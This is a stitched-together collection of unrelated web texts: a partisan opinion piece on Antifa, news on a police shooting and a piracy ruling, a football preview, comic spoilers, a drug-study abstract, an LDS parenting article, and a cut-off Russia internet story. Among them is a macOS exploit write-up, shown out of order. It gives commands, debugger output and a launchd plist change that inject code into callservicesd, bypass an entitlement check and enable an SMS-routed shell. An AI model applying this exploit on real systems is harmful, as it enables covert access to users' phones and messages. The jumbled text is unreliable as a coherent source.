Chomsky is likely referring to the repeated violence seen on college campuses , where Antifa violently assaulted anyone attempting to attend events by controversial right-wing speakers , like Milo Yiannopolous , whose speech at the University of Berkley was canceled earlier this year as numerous attendees were violently beaten for simply trying to attend the event . Antifa then proceeded to cause over $ 100,000 dollars of damage in their subsequent rioting on the UC Berkley campus .
According to a report by Forbes :
Yiannopoulos had been invited by the Berkeley College Republicans to speak , but announced around 8pm PT on Wednesday that he had been evacuated from the campus due to massive protests . “ The hard left has become so antithetical to free speech in the last few years , ” he said in a video posted on Facebook . The event began as a peaceful protest . Some students reported on Facebook that things turned violent when masked individuals not affiliated with the school turned up , though the details of what happened are still unverified . Images on Twitter depicted violent protests with damage to local business .
on Antifa at Berkley : `` according to reports , the protests were peaceful until a group of several dozen… https : //t.co/CVzMySebdq — Kandace ( @ Canada4Bernie ) August 17 , 2017
The excuse used by Antifa is that they are smashing “ fascism , ” while in reality , they are simply attempting to shut down public discourse , through violence , that challenges their ideological views .
“ When confrontation shifts to the arena of violence , it 's the toughest and most brutal who win – and we know who that is , ” said Chomsky , a professor emeritus of linguistics at the Massachusetts Institute of Technology . “ That 's quite apart from the opportunity costs – the loss of the opportunity for education , organizing , and serious and constructive activism . ”
While the mainstream media , and some prominent members of the GOP , came out to condemn President Trump 's Tuesday statement at a press conference – where he noted that “ both sides ” deserved blame – the reality is that both sides are to blame for the steadily increasing violence connected to political speech . Critics believed that the president should have solely singled out white supremacists .
“ There was a group on this side , you can call them the left , you 've just called them the left , that came violently attacking the other group , ” Trump said on Tuesday . “ So , you can say what you want , but that 's the way it is . ”
Make no mistake that what you are witnessing is a self-sustaining feedback loop of violence . As the alt right rose to prominence as a nationalist movement , with overtones of protectionism , which many on the left label as racist ( obviously there is fringe minority of racist elements within the larger alt right movement ) , the hard left felt a rising tide of open bigotry towards minorities and foreigners , which precipitated their attempts to shut down anyone who espouses ideas that conflict with their progressive and inclusive worldview .
In response to seeing people beaten for simply trying to attend a speech , or wearing a “ Make America Great Again ” hat , the hard right began to gain conflict solidarity as a more cohesive movement due to the repeated and continuous assaults on Trump supporters – which interestingly the mainstream media never seemed to condemn nor publicize .
Mark Lance , professor of justice and peace at Georgetown University , said he views the Antifa movement 's rise as a response to more open fascists organizing .
“ I 'm seeing more concrete productive discussion between anti-fascists and others on the Left these days than ever before in my life , ” Lance said .
“ There is reason to think that it will become integrated into an emerging coalition that includes Sanders supporters , democratic socialists , dreamers , the Movement for Black Lives , environmentalists , [ and ] Native American organizers , ” he said .
Lance said Antifa actions “ need not be violent confrontation , but most Antifa , in practice , are willing to physically resist fascist marches and defend themselves against fascist attack . ”
But therein lies the rub…
How can a college student that supports Trumps , and attends a speech by Milo Yiannopoloulos be given a blanket label of being a fascist ?
So , is anyone who voted for Trump now considered a racist , fascist or Nazi ?
It is important to point out that this is not an endorsement of Trump . While Americans fight amongst themselves , under Trump 's watch , the military-industrial complex is laying waste to the Middle East and the police state is continuously expanding — just as they did under Obama .
While it 's one thing for “ Antifa ” to physically resist or defend themselves , Lance 's assertions of what has manifested seem disingenuous to the reality seen over the past 16 months , as the majority of the offensive violence was perpetrated against non-violent people whose ideological views are at simply at odds with that of the “ Antifa ” movement .
While it may be ok to punch an actual Nazi who is threatening you , when did it become ok to punch people for simply attempting to listen , or espouse , ideas you do n't like or find repugnant ?
What we see transpiring is blanket label being given to anyone whose views conflict that of Antifa , thus being labeled as a Nazis , racist , or fascist – when in reality the person being assaulted may be none of those things .
Ironically , this how the actual Nazi movement in Weimar Germany was able to marginalize Jews , labeling them as subhuman and vermin . Essentially , Antifa is operating with similar tactics as they attempt to dehumanize those they want to politically marginalize . Calling them racists , fascists or Nazis , is a means of legitimizing the violence they perpetuate in the name of their political ideology .
No one is condemning the defensive use of force against those attempting to perpetrate violence on others , but using violence to silence those whose politics differ from yours — who are not a violent threat — is when you cross the line from being an anti-fascists to being an actual fascist .
Spread the love
Marksville , LA — A horrifying and heartbreaking police shooting occurred Tuesday night in Louisiana leaving a father in critical condition and his 6-year-old son dead .
According to The Advocate ,
The boy , Jeremy David Mardis , of Effie , was killed by multiple gunshot wounds to the head and torso . He was pronounced dead at the scene , Avoyelles Parish Coroner L.J . Mayeaux said Wednesday . The boy was a student at Lafargue Elementary in Effie . The shooting on Martin Luther King Drive in Marksville happened at the end of a pursuit and involved multiple city marshals from Ward 2 , Louisiana State Police spokesman Trooper Daniel “ Scott ” Moreau said .
Police sources claim that the driver , Chris Few , was attempting to flee when they fired on him . According to the AP , the coroner said Few reached a dead end and was backing into the marshals when they fired . The coroner also reportedly said Mardis was “ caught in the line of fire . ”
School Superintendent Blaine Dauzat expressed his grief over the death of Mardis who attends Lafargue Elementary School . Dauzat is gathering grief counselors and sending them to the school , located in the Effie community , to assist students and staff during this time .
Of course , fleeing from the police with a child in the car is a terrible decision . However , as we have seen time and time again , police officers fire into vehicles , that do not pose a threat , killing the drivers .
In just the last few months , we 've seen video footage of police officers killing drivers who posed no threat whatsoever .
Dashcam footage was released last week of police killing Zachary Hammond because his date sold a tiny bit of marijuana to an undercover cop .
Prior to the murder of Hammond , officer Ray Tensing was caught on video killing Sam Dubose in a similar fashion .
Two months ago , cellphone video was released showing police murdering 33-year-old John Barry , a mentally ill man who attempted to flee from police during a breakdown .
Voltage Pictures , the company behind the Oscar-winning Hurt Locker movie , must pay $ 21,557 to expose 2,000 alleged pirates . Canada 's Federal Court ruled on the long running dispute between the movie studio and Internet provider Teksavvy this week , a decision that 's crucial for future 'copyright trolling ' efforts .
More than two years ago movie studio Voltage Pictures took its legal crusade against pirating BitTorrent users to Canada .
After targeting tens of thousands of people in the US , the company hoped to expose 2,000 Internet subscribers of Canadian ISP TekSavvy . The studio behind “ The Hurt Locker ” argued that they have a solid case under the Copyright Act .
The efforts led to objections from the Canadian Internet Policy and Public Interest Clinic ( CIPPIC ) who demanded safeguards so Voltage would n't demand hefty fines from subscribers without oversight . The court agreed on this , but allowed the customers to be exposed .
The only matter that remained were the costs associated with identifying the alleged pirates . According to Voltage these would only be a few hundred Canadian dollars , but Teksavvy claimed more that $ 350,000 .
This week the Federal Court ruled on the matter ( pdf ) , settling the costs at $ 21,557 . This includes $ 17,057 in technical administrative costs and $ 4,500 in legal fees associated with the IP-address lookups .
The total sum translates to roughly $ 11 per IP-address , which is a tiny fraction of the thousands of dollars in settlements Voltage usually requests .
The Court decided not to award any assessment costs , noting that both parties are intent on disparaging each other 's business practices . Taking claims from both sides into account it concluded that neither party should be rewarded for its conduct .
“ TekSavvy , without justification , has greatly exaggerated its claim , while Voltage has unreasonably sought to trivialize it based on unreliable and largely irrelevant evidence , ” Judge Aronovitch writes .
In the future it would be wise to agree on a fixed rate for linking IP-addresses to the personal details of subscribers before taking the matter to court , the Judge further notes .
“ The best practice , in my view , would be for the rights holder to ascertain , in advance , with clarity and precision , the method of correlation used by the ISP , as well as the time and costs attendant on the execution of the work based , to begin , on a hypothetical number of IP addresses . ”
The verdict opens the door for more of these cases in Canada . The question is , however , whether the costs and the restrictions still make it worthwhile .
University of Ottawa professor Michael Geist , who followed the case closely , believes this troll-type activity may not be as financially viable as Voltage has hoped .
“ With the cap on liability for non-commercial infringement , the further costs of litigating against individuals , the actual value of the works , and the need to obtain court approval on demand letters , it is hard to see how this is a business model that works , ” Geist notes .
Voltage , however , appears to be determined to continue its actions against the subscribers . The studio 's lawyer is happy with the verdict and says the decision “ confirms the court 's commitment to facilitate anti-piracy and allow companies like Voltage to pursue pirates . ”
( Note : One of the league 's top executives in personnel agreed to break down the Eagles roster for New Jersey Advance Media . So over the next two weeks , we 'll take a look at the team position by position . Today is wide receivers . )
One year after getting just 68 snaps from their first-round draft pick -- linebacker Marcus Smith -- the Eagles may have hit pay dirt with 2015 first-round pick , Nelson Agholor .
The wide receiver from Southern Cal , taken with the 20th overall pick , should have an immediate impact and thrive in head coach Chip Kelly 's offense , according to an executive in personnel for another team .
`` He should be good , real good , '' the executive said . `` I 'd bet on him . ''
Agholor caught 104 passes for 1,313 yards and 12 touchdowns last year for the Trojans . At the Scouting Combine , he measured 6 feet , 198 pounds and ran a 4.4 in the 40-yard dash .
`` He 'll come in and produce right away , '' the executive said . `` He has the right mentality and just a great approach to the game . He 's going to help them . And in that offense , he 'll put up numbers . ''
Jeremy Maclin , who left as a free agent for Kansas City and a reunion with former head coach Andy Reid , led the Eagles with 85 receptions , 1,318 yards and 10 touchdowns last year .
Agholor could help make up some of those numbers along with second-year men Jordan Matthews and Josh Huff . Veterans Riley Cooper and Miles Austin round out what appears to be a good group of wide receivers .
`` I look at Matthews as a good receiver , very solid in every aspect , but not a No . 1 guy , '' the executive said . `` Agholor is a No . 1 . So now Matthews wo n't have that pressure on him . They 'll be good together . ''
Matthews , as a rookie second-round pick , caught 67 passes for 872 yards and eight touchdowns last year .
QUARTERBACKS : Chip Kelly can make Sam Bradford a success
Huff , bothered by a shoulder injury early in the season and then seemingly overwhelmed , caught eight passes for 98 yards as a rookie . He was impressive through the spring OTAs and minicamp .
`` He 's got talent , '' the executive said . `` He 's not bad at all . ''
A year ago , Maclin played 87 percent of the offensive snaps and Cooper , who the coaching staff likes for his blocking ability , played 81 percent . Matthews , primarily in the slot , was on the field 65 percent of the time . It then dropped to Huff 's 18 percent .
It will be interesting to see how Kelly and receiver coach Bob Bicknell split up the time this season . But know that Agholor will be right in the middle of it all .
( Tomorrow : Offensive Line )
Follow Mark Eckel on Twitter at @ MarkEckel08 . Find NJ.com Sports on Facebook.Contact Mark Eckel at mjeck04 @ verizon.net .
Tuesday , October 13 , 2015 at 10:22AM
callservicesd uses the AddressBook framework
The AddressBook framework contains a method 'debugPluginPaths ' which uses the environment variable AB_PLUGIN_PATH to add paths that will be searched for plugins .
It 's normally not possible to use this variable to `` hijack '' existing plugins , as the `` official '' plugins in /System/Library/Address Book Plug-Ins/ are processed last , overwriting any user supplied plugins in AB_PLUGIN_PATH .
By using sandbox-exec to launch callservicesd with a profile that blocks access to a specific plugin in /System/Library/Address Book Plug-Ins/ , it is possible to work around this limitation and supply a replacement user controlled plugin which will run inside the address space of callservicesd .
Once this is done , the 'valueForEntitlement : ' method is swizzled and replaced with a method that simply returns 'true ' .
This bypasses the check for the com.apple.telephonyservices.callservicesd entitlement , allowing the original exploit for CVE-2015-3785 to work again .
[ 245 ] 6951F277-550F-3E43-B116-F45F833D0310 0x0000000106fea000 /System/Library/Address Book Plug-Ins/LocalSource.sourcebundle/Contents/MacOS/LocalSource [ 246 ] 2B7D94E1-8B6F-382C-BA78-7928F09C309A 0x0000000106fef000 /System/Library/Address Book Plug-Ins/DirectoryServices.sourcebundle/Contents/MacOS/DirectoryServices [ 247 ] 1DDCFA21-F20A-32BA-91C4-41354D7DA44D 0x000000010999b000 /System/Library/Address Book Plug-Ins/POIPlugin.sourcebundle/Contents/MacOS/POIPlugin
AB_PLUGIN_PATH
$ tail -4 /tmp/injectab.sourcebundle/Contents/Info.plist < key > NSPrincipalClass < /key > < string > ABPointOfInterestSource < /string > < /dict > < /plist > $ AB_PLUGIN_PATH=/tmp lldb /System/Library/PrivateFrameworks/TelephonyUtilities.framework/callservicesd ( lldb ) target create “ /System/Library/PrivateFrameworks/TelephonyUtilities.framework/callservicesd ” Current executable set to ‘ /System/Library/PrivateFrameworks/TelephonyUtilities.framework/callservicesd ' ( x86_64 ) . ( lldb ) r Process 70176 launched : ‘ /System/Library/PrivateFrameworks/TelephonyUtilities.framework/callservicesd ' ( x86_64 ) 2015-09-07 18:00:25.054 callservicesd [ 70176:19289423 ] Failed to get the bundle id Process 70176 stopped * thread # 1 : tid = 0x126554f , 0x00007fff8f3494de libsystem_kernel.dylib ` mach_msg_trap + 10 , queue = ‘ com.apple.main-thread ' , stop reason = signal SIGSTOP frame # 0 : 0x00007fff8f3494de libsystem_kernel.dylib ` mach_msg_trap + 10 libsystem_kernel.dylib ` mach_msg_trap : - > 0x7fff8f3494de < +10 > : retq 0x7fff8f3494df < +11 > : nop libsystem_kernel.dylib ` mach_msg_overwrite_trap : 0x7fff8f3494e0 < +0 > : movq % rcx , % r10 0x7fff8f3494e3 < +3 > : movl $ 0x1000020 , % eax ( lldb ) image list injectab error : no modules found that match ‘ injectab ' ( lldb ) image list POIPlugin [ 0 ] 1DDCFA21-F20A-32BA-91C4-41354D7DA44D 0x00000001005e0000 /System/Library/Address Book Plug-Ins/POIPlugin.sourcebundle/Contents/MacOS/POIPlugin ( lldb )
$ sudo mv /System/Library/Address\ Book\ Plug-Ins/POIPlugin.sourcebundle ~ $ AB_PLUGIN_PATH=/tmp lldb /System/Library/PrivateFrameworks/TelephonyUtilities.framework/callservicesd ( lldb ) target create `` /System/Library/PrivateFrameworks/TelephonyUtilities.framework/callservicesd '' Current executable set to '/System/Library/PrivateFrameworks/TelephonyUtilities.framework/callservicesd ' ( x86_64 ) . ( lldb ) r Process 70220 launched : '/System/Library/PrivateFrameworks/TelephonyUtilities.framework/callservicesd ' ( x86_64 ) 2015-09-07 18:06:51.951 callservicesd [ 70220:19297629 ] + [ ABPointOfInterestSource persistenceWithUID : path : ] : unrecognized selector sent to class 0x1000fe230 2015-09-07 18:06:51.952 callservicesd [ 70220:19297629 ] Couldn ` t init moc : + [ ABPointOfInterestSource persistenceWithUID : path : ] : unrecognized selector sent to class 0x1000fe230 2015-09-07 18:06:51.952 callservicesd [ 70220:19297629 ] Could not initialize the shared address book 2015-09-07 18:06:52.202 callservicesd [ 70220:19297629 ] Failed to get the bundle id Process 70220 stopped * thread # 1 : tid = 0x126755d , 0x00007fff8f3494de libsystem_kernel.dylib ` mach_msg_trap + 10 , queue = 'com.apple.main-thread ' , stop reason = signal SIGSTOP frame # 0 : 0x00007fff8f3494de libsystem_kernel.dylib ` mach_msg_trap + 10 libsystem_kernel.dylib ` mach_msg_trap : - > 0x7fff8f3494de : retq 0x7fff8f3494df : nop libsystem_kernel.dylib ` mach_msg_overwrite_trap : 0x7fff8f3494e0 : movq % rcx , % r10 0x7fff8f3494e3 : movl $ 0x1000020 , % eax ( lldb ) image list injectab [ 0 ] A99FBAF2-B1B0-3169-BB47-1B221CBDC62B 0x00000001000fd000 /tmp/injectab.sourcebundle/Contents/MacOS/injectab ( lldb ) image list POIPlugin error : no modules found that match 'POIPlugin ' ( lldb )
- [ ABDataSourcePluginIndex indexPlugins ] for ( plugin in AB_PLUGIN_PATH , /System/Library/Address Book Plug-Ins/ ) if ( plugin.NSPrincipalClass ) plugins [ file.NSPrincipalClass ] = plugin.path ;
$ ls -ld /System/Library/Address\ Book\ Plug-Ins/POIPlugin.sourcebundle/ /tmp/injectab.sourcebundle/ drwxr-xr-x 3 root wheel 102 Sep 12 2014 /System/Library/Address Book Plug-Ins/POIPlugin.sourcebundle/ drwxr-xr-x 3 dbastone wheel 102 Sep 4 17:47 /tmp/injectab.sourcebundle/ $ AB_PLUGIN_PATH=/tmp lldb -- /usr/bin/sandbox-exec -p ' ( version 1 ) ( allow default ) ( deny file-read * ( regex # '' ^/System/Library/Address Book Plug-Ins/POI * '' ) ) ' /System/Library/PrivateFrameworks/TelephonyUtilities.framework/callservicesd ( lldb ) target create `` /usr/bin/sandbox-exec '' Current executable set to '/usr/bin/sandbox-exec ' ( x86_64 ) . ( lldb ) settings set -- target.run-args '-p ( version 1 ) ( allow default ) ( deny file-read * ( regex # '' ^/System/Library/Address Book Plug-Ins/POI * '' ) ) ' `` /System/Library/PrivateFrameworks/TelephonyUtilities.framework/callservicesd '' ( lldb ) process launch Process 70395 launched : '/usr/bin/sandbox-exec ' ( x86_64 ) Process 70395 stopped * thread # 1 : tid = 0x126ddb1 , 0x00007fff5fc01000 dyld ` _dyld_start , stop reason = exec frame # 0 : 0x00007fff5fc01000 dyld ` _dyld_start dyld ` _dyld_start : - > 0x7fff5fc01000 : popq % rdi 0x7fff5fc01001 : pushq $ 0x0 0x7fff5fc01003 : movq % rsp , % rbp 0x7fff5fc01006 : andq $ -0x10 , % rsp ( lldb ) c Process 70395 resuming 2015-09-07 18:43:36.620 callservicesd [ 70395:19324337 ] NSPrincipalClass for bundle not found : /System/Library/Address Book Plug-Ins/POIPlugin.sourcebundle 2015-09-07 18:43:36.632 callservicesd [ 70395:19324337 ] entitlement checks bypassed 2015-09-07 18:43:36.632 callservicesd [ 70395:19324337 ] + [ ABPointOfInterestSource persistenceWithUID : path : ] : unrecognized selector sent to class 0x1000fe230 2015-09-07 18:43:36.632 callservicesd [ 70395:19324337 ] Couldn ` t init moc : + [ ABPointOfInterestSource persistenceWithUID : path : ] : unrecognized selector sent to class 0x1000fe230 2015-09-07 18:43:36.632 callservicesd [ 70395:19324337 ] Could not initialize the shared address book 2015-09-07 18:43:36.854 callservicesd [ 70395:19324337 ] Failed to get the bundle id Process 70395 stopped * thread # 1 : tid = 0x126ddb1 , 0x00007fff8f3494de libsystem_kernel.dylib ` mach_msg_trap + 10 , queue = 'com.apple.main-thread ' , stop reason = signal SIGSTOP frame # 0 : 0x00007fff8f3494de libsystem_kernel.dylib ` mach_msg_trap + 10 libsystem_kernel.dylib ` mach_msg_trap : - > 0x7fff8f3494de : retq 0x7fff8f3494df : nop libsystem_kernel.dylib ` mach_msg_overwrite_trap : 0x7fff8f3494e0 : movq % rcx , % r10 0x7fff8f3494e3 : movl $ 0x1000020 , % eax ( lldb ) image list injectab [ 0 ] A99FBAF2-B1B0-3169-BB47-1B221CBDC62B 0x00000001000fd000 /tmp/injectab.sourcebundle/Contents/MacOS/injectab ( lldb ) image list POIPlugin error : no modules found that match 'POIPlugin '
$ diff -u /System/Library/LaunchAgents/com.apple.telephonyutilities.callservicesd.plist csd_launchd.plist -- - /System/Library/LaunchAgents/com.apple.telephonyutilities.callservicesd.plist 2015-02-26 03:23:52.000000000 -0500 +++ csd_launchd.plist 2015-09-07 17:44:48.000000000 -0400 @ @ -8,6 +8,8 @ @ < dict > < key > NSRunningFromLaunchd < /key > < string > 1 < /string > + < key > AB_PLUGIN_PATH < /key > + < string > /tmp < /string > < /dict > < key > Label < /key > < string > com.apple.telephonyutilities.callservicesd < /string > @ @ -56,6 +58,9 @ @ < /dict > < key > ProgramArguments < /key > < array > + < string > /usr/bin/sandbox-exec < /string > + < string > -p < /string > + < string > ( version 1 ) ( allow default ) ( deny file-read * ( regex # '' ^/System/Library/Address Book Plug-Ins/POI * '' ) ) < /string > < string > /System/Library/PrivateFrameworks/TelephonyUtilities.framework/callservicesd < /string > < /array > < key > EnablePressuredExit < /key > $ launchctl unload /System/Library/LaunchAgents/com.apple.telephonyutilities.callservicesd.plist $ launchctl load csd_launchd.plist $ killall callservicesd
In our previous post , we looked at a bug that allowed malware running on OS X to make calls on a user 's iPhone without their knowledge . Apple released a patch to fix this bug in OS X 10.10.5 by adding a check for an entitlement that could only be granted by Apple . This was easily bypassed with root access by injecting code to disable the entitlement check . In this post , we 'll take a look at another bug that allowed bypassing the entitlement check without root.For those that 'd like to skip directly to the exploit code , it 's available on our Github repo in the SMShell directory.Our goal is to somehow get code running inside FaceTime ( since it has the entitlement ) or callservicesd ( since it checks for the entitlement ) . callservicesd is the more interesting target , since it 's got entitlements of its own that may be useful later . It turns out we can cause callservicesd to load code we control , thanks to Address Book plugins and a little help from the OS X sandbox.At a high level , it works like this : If we attach lldb to callservicesd and look at 'image list ' , there are a few things that look interesting : If callservicesd is loading Address Book plugins , maybe it 'll also load user plugins that are placed in ~/Library/Address Book Plug-Ins ? Unfortunately it 's not that simple . callservicesd wo n't load anything placed in that directory , even copies of the plugins from /System/Library/Address Book Plug-Ins/ . In addition , it 's not loading everything in /System/Library/Address Book Plug-Ins/ - only those 3 plugins . A bit of investigation shows that on startup , the AddressBook framework loads plugins that implement certain classes as indicated by the NSPrincipalClass key in the plugin 's Info.plist . The plugins correspond to different type of account `` sources '' , so presumably if one had an Exchange or CardDAV account configured on the system those plugins would load as well.This means that unless a non-root user can somehow get a plugin into that directory that implements one of these classes , this seems to be a dead end . However , a closer look at the AddressBook framework reveals another avenue that may do exactly what we want.While looking for anything plugin related in AddressBook.framework , the following string in the binary immediately jumps out : Could it really be that easy ? Is this an environment variable that controls where plugins are loaded from ? Yes and no . AddressBook wo n't blindly load plugins placed into AB_PLUGIN_PATH , but what if we try a plugin with an NSPrincipalClass of a system plugin we know will be loaded ? We 'll use 'ABPointOfInterestSource ' , which is currently provided by /System/Library/Address Book Plug-Ins/POIPlugin.sourcebundle/.Our ‘ injectab ' plugin in /tmp still did n't load . What happens if we cheat for a second , and move the original POIPlugin out of the way so it is n't loaded ? This time our ‘ injectab ' plugin successfully loads into callservicesd . This means that it 's possible to load plugins from AB_PLUGIN_PATH , but the ones in /System/Library/Address Book Plug-Ins/ take precedence . In pseudo-objc , it roughly looks like this : indexPlugins builds a hash of plugins keyed on NSPrincipalClass by iterating files in AB_PLUGIN_PATH first , followed by /System/Library/AddressBookPlugins which will overwrite any existing values.If we can cause the if statement above to return false while reading one or more system plugins , we can inject our plugin by “ borrowing ” its NSPrincipalClass.sandbox-exec is a command line utility included with OS X that allows you to , as the name might suggest , execute commands within a sandbox profile . If we run callservicesd inside a profile that denies it read access to a system plugin , the if statement will fail and our plugin should load instead . This trick only works on processes that are n't already sandboxed , and luckily callservicesd is not . This is a fun example of turning a security feature against the system it 's designed to protect . Lets give it a shot : It worked ! Our plugin code is now loaded into callservicesd without requiring root . We can now swizzle the valueForEntitlement method as shown earlier , and the original exploit will work again . Almost.callservicesd is meant to be started by launchd when it receives relevant requests for XPC services . If we start it manually using our custom environment and sandbox-exec , launchd still starts its own “ clean ” copy which ends up servicing the XPC requests itself.To handle this , we 'll simply unload the system 's callservicesd plist and replace it with a modified version that sets AB_PLUGIN_PATH and invokes sandbox-exec.Now that we 've got code running inside callservicesd , some new possibilities open up . We no longer need to use XPC to communicate with callservicesd , since we can invoke methods directly . Our code also now runs with all of the entitlements of callservicesd.Remember the entitlement that imagent checked for earlier , preventing us from sending SMS ? It just so happens that callservicesd has it . Our injected plugin code is thus free to communicate with imagent and send SMS messages to arbitrary phone numbers.A short proof of concept is available in the SMShell directory . This code routes a bash shell over SMS via a user 's paired iPhone , without requiring root access on OS X 10.10.5 and below . Because SMS is used , this shell will bypass any IP based network filtering in use.In OS X 10.11 , the debugPluginPaths implementation now returns an empty object and all references to AB_PLUGIN_PATH have been removed.Additionally , Session Integrity Protection prevents these injection attacks from being performed as root .
Walking Dead # 173 is out tomorrow . Last issue we got the feeling that Jesus was in trouble since Beta got the jump on him . I can confirm someone dies this issue . Check out the spoilers below . The pictures are spoiler protected , the accompanying text is not so proceed at your own risk .
Where we left off last time , Beta got the jump on Jesus .
And the fight begins .
And it does n't look good for Jesus .
And the death… .
And the secret is out , identity revealed .
Ok , now he is dead .
They move on to get the Whisperers .
Meanwhile Rick does what he does best .
Michonne , The Princess , Eugene and the crew meet up at the meeting spot for the crew on the radio .
And maybe it was n't such a good idea . Is this the beginnings of a new enemy group ?
Abstract
Rationale : To determine the association between MDMA misuse and neurocognition using meta-analysis . Objective : Separate analyses were conducted based on two sets of inclusion/exclusion criteria . A relatively stringent set required that the subjects be matched on important moderator variables , whereas the other did not . The study participants ' performance in the following neurocognitive domains was reviewed : attention/concentration , verbal and nonverbal learning and memory , psychomotor speed and executive systems functioning . Results : In the 11 studies meeting the relatively stringent inclusion/exclusion criteria for this review , MDMA use was associated with neurocognitive deficits in each domain . Similarly , in the 23 studies meeting the relatively lenient inclusion/exclusion criteria for this review , MDMA use was associated with neurocognitive deficits in each domain . Small to medium effect sizes were generally observed . A comparison of the effect sizes across the two sets of analyses did not reveal significant differences . Conclusions : The findings from this review reveal that MDMA use is associated with neurocognitive deficits . The implications of these findings are discussed . © 2006 Springer-Verlag .
Our day is like no other in the history of the world . Think of the tremendous progress made in technology just during your lifetime . For example , we now have “ smart phones ” that are also a camera , GPS , calculator , clock , flashlight , game console , search engine , and much more .
Our society is making tremendous progress when it comes to technology , while the most important unit in society is falling apart . What is the problem ? I believe it is the failure to correct our parenting mistakes . Bishop Victor L. Brown said , “ Satan 's ultimate goal is to destroy the family. ” To stop Satan from succeeding , we must approach the family just as brilliant scientists have approached technology and learn from our mistakes to make progress .
For those who seek to improve their parenting and follow counsel from the prophets , great promises are given . However , it is not easy for most to admit their mistakes . All too often , we can recognize mistakes made by others while having a blind spot when it comes to our own .
With this in mind , approximately 500 active LDS members nationwide were asked to answer this question : What mistakes do you feel your parents made when you were growing up in their home ?
Here 's what they had to say .
# 1 : Failure to establish a home environment that reflects the gospel
“ Our home environment did not seem to reflect what my parents professed to believe in . For example , there were no pictures of Christ or temples on the walls of any of the rooms in our home. ” —Survey respondent
Over the years , I have had the opportunity to stay with many LDS families while on speaking assignments . Often the
parents have had me sleep in a teenager 's bedroom . In some of these rooms , I have noticed pictures of tattooed and scantily clad movie stars , along with televisions , computers , and teen magazines . In others , I have seen pictures of Christ and temples , with scriptures and journals lying on the nightstand . I can truthfully say that the teenagers who lived in those rooms seemed to reflect the values of the things in their rooms .
President Ezra Taft Benson said of righteous Saints , “ Enter their homes , and the pictures on their walls , the books on their shelves , the music in the air , their words and acts reveal them as Christians. ” When we say we are committed to the gospel but have no outward displays of that commitment in our homes , we may confuse our children .
Try this : Take a tour of every room in your home to see if the pictures on the walls , books on the shelves , music , television stations , and internet sites reflect the values of the gospel . Make changes as necessary to create a Christ-centered home .
# 2 : Failure to be at the crossroads of children 's lives
“ During my teenage years , I do n't ever remember a time when either of my parents was at home when I came home from school . Nor were they ever up waiting for me when I came home from a date or being out with friends. ” —Survey respondent
The best way to help youth avoid serious sin is to recognize warning signs before the adversary can take hold . Speaking to parents , President Ezra Taft Benson said , “ Take time to always be at the crossroads when your children are either coming or going . ”
Very seldom do active LDS youth fall quickly into serious sin . They are usually crossroads and viewing their countenances every day and night , you can tell if anything is wrong , even if it 's just by reading their body language . There is a much greater chance of preventing serious sin if problems are caught early .
Try this : Arrange to have one parent home when your children arrive from school . Always wait up when your children are out at night . If you see any change in your child 's countenance , try to get to the bottom of it immediately .
# 3 : Allowing children to associate too closely with friends who do not share their same standards
“ My parents let me hang out with people who did not have the same standards as our family . I went out with some shady characters and got into more trouble than I should have. ” —Survey respondent
If you want to know what your children are doing , look closely at their friends . Good friends almost always do the same kinds of things because friends are often chosen on the basis of similarities . By the same token , those who want to join a group of friends will often modify their behavior to conform to the values of the group . The old saying “ birds of a feather flock together ” is usually true .
Speaking to youth , President Thomas S. Monson said : “ In a survey made in selected wards and stakes of the Church , we learned a most significant fact : those persons whose friends married in the temple usually married in the temple . . . . The influence of one 's friends appeared to be a highly dominant factor—even more so than parental urging , classroom instruction , or proximity to a temple. ” Did you catch what he said ? Friends have more of an impact on children than parents , seminary , Young Men and Young Women , or where you live .
President Gordon B. Hinckley taught that youth who are friends “ with those of their own kind ” tend to “ do well and to excel in their endeavors. ” He then gave this inspired counsel to parents : “ Open your homes to the friends of your children . If you find they have big appetites , close your eyes and let them eat . Make your children 's friends your friends . ”
Try this : Open your home to your children 's friends and provide plenty of food , fun , and love .
# 4 : Failure to express love and give appropriate physical affection to family members
“ The only time I remember my mother giving me a brief hug was when I was leaving for college . I think we were all starved for affection and went seeking it outside the home. ” —Survey respondent
A few years ago , I attended a talk given to approximately 350 LDS youth by a very popular speaker . The message was well presented , and the youth responded positively . After the class ended , several teenagers moved to the front of the room to talk to this man . Instead of the traditional handshake , the speaker hugged each of the youth , patted them on the back , and told them how special they were .
Then something unusual happened . Many of those leaving the classroom noticed what was happening and came back . A long line formed for an opportunity to get a hug and uplifting words from this dynamic teacher . Many of the teenagers even burst into tears after their short embrace . After I spoke to several of the youth , it became obvious to me that it was n't just the talk that affected them that day : it was the physical embrace and the words of encouragement that triggered their emotions .
Research shows that youth who do not receive appropriate affection from parents often seek it outside the home . The frightening thing is the apparent connection between lack of affection in a youth 's life and the high rates of immorality in our society . Parents should follow the example of Jesus Christ : “ And it came to pass that when Jesus had made an end of these sayings , he touched with his hand the disciples whom he had chosen , one by one , even until he had touched them all , and spake unto them as he touched them ” ( 3 Nephi 18:36 ) . Perhaps of all the ways of showing love , appropriate physical touch is the most powerful .
Try this : Make it a daily ritual that you tell your children you love them and give them appropriate physical affection .
# 5 : Allowing children to steady date during the teen years
“ I feel my parents ' mistake was to be too trusting of what teenagers who were taught the gospel would do when placed in tempting situations . Going steady was my downfall. ” —Survey respondent
Every prophet in modern times has given stark warnings about the dangers of steady dating during the teen years . President Gordon B. Hinckley , for example , said , “ Steady dating at an early age leads so often to tragedy . Studies have shown that the longer a boy and girl date one another , the more likely they are to get into trouble . It is better . . . to date a variety of companions until you are ready to marry. ” And yet , we see many youths within the Church steady dating . It appears that it is not just young people who get excited about steady relationships ; often parents encourage it . Perhaps you have heard comments like these from LDS parents :
“ His little girlfriend . . . . ” “ They are so cute together . ”
So what 's the big deal about steady dating ? While young single adults are encouraged to marry , few parents would suggest two 16-year-olds get married . And yet , many seem fine with their teenagers being in committed relationships .
LDS youth and young single adults seldom fall into immorality overnight . Most have been taught all through life that physical intimacy outside the bonds of marriage is a sin . To go against those teachings , young people are usually broken down in gradual steps . Steady dating allows that to happen because it ignites powerful feelings for another person .
Try this : Do not allow your children to steady date during their teen years . Set clear boundaries and follow up on dates with questions about who went and what activities were involved .
A Family Mission Statement
Nearly every corporation in America has a mission statement that provides direction for decisions made within the company . Parents should do the same in their household . Simply put , make your family 's mission statement one of obedience to the loving counsel of the modern prophets .
Randal A. Wright is an accomplished author with a Ph.D. in family studies . For more on LDS parenting and the results of his survey , check out Power Parenting in the LDS Home .
Russia has run large scale experiments to test the feasibility of cutting the country off the World Wide Web , a senior industry executive has claimed .
The tests , which come amid mounting concern about a Kremlin campaign to clamp down on internet freedoms , have been described by experts as preparations for an information blackout in the event of a domestic political crisis .
